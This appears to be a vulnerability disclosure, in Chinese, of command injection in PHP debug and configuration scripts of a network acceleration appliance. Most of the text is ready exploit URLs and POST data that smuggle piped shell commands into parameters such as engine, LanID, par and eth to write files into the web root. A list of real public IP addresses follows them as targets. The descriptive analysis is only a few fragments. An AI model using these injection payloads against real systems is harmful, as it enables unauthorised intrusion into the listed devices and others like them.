bytecache_run_action.php:
第一处:
setValue
跟进去:
再跟进去:
说明value可控
第二处:
startByteCacheDebug($engine,$ipFilterNum);
跟进去:
第三处:
当action 不是1的时候
stopByteCacheDebug($engine);
跟进去:
证明一处即可:
http://218.206.217.19:8080/acc/debug/bytecache_run_action.php?action=1&engine= | echo wooyun > a.php | &ipfilter=10
访问:
http://218.206.217.19:8080/acc/debug/a.php
第四处:
change_lan.php
跟进setAppexSystemConfigItemValue:
再跟进;
http://61.148.24.182:8080/change_lan.php
postdata:
LanID=1' | echo ' wooyun' > a.php | '
第五处:
enable_tool_debug.php:
runTool:
http://61.54.222.33:8080/acc/tools/enable_tool_debug.php?val=0&tool=1&par=172.0.0.1' | echo wooyun > a.php | '
getMacAddr.php:
跟进getMacAddrFromIfName
http://218.206.217.19:8080/acc/network/getMacAddr.php?eth= | echo wooyun > c.php |
访问http://218.206.217.19:8080/acc/network/c.php 即可
http://61.148.24.182:8080/
http://61.54.222.39:8080/
http://61.148.24.182:8080
http://61.54.222.33:8080